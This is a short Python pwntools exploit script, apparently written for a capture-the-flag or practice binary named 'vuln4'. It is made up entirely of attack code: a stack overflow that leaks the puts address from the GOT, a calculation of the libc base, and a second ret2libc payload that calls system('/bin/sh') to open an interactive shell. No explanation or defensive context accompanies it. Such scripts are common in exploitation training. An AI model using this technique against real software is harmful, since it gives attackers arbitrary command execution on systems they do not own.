from pwn import *
s = process("./vuln4")
libc = ELF("./libc")
elf = ELF("./vuln4")
s.recvuntil("You should find puts yourself")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
bss = elf.bss()+0x50
main = 0x080484EA
pay = "A"*22
pay += p32(puts_plt)
pay += p32(main)
pay += p32(elf.got['puts'])
gdb.attach(s)
s.sendline(pay)
s.recvline()
puts_libc = u32(s.recv(4))
print "puts libc : " + hex(puts_libc)
libc_base = puts_libc - libc.symbols['puts']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search("/bin/sh\0"))
print "libc_base : " + hex(libc_base)
print "system : " + hex(system)
print "bin_sh : " + hex(bin_sh)
s.recvuntil("You should find puts yourself")
pay = "A"*22
pay += p32(system)
pay += "AAAA"
pay += p32(bin_sh)
s.sendline(pay)
s.interactive()
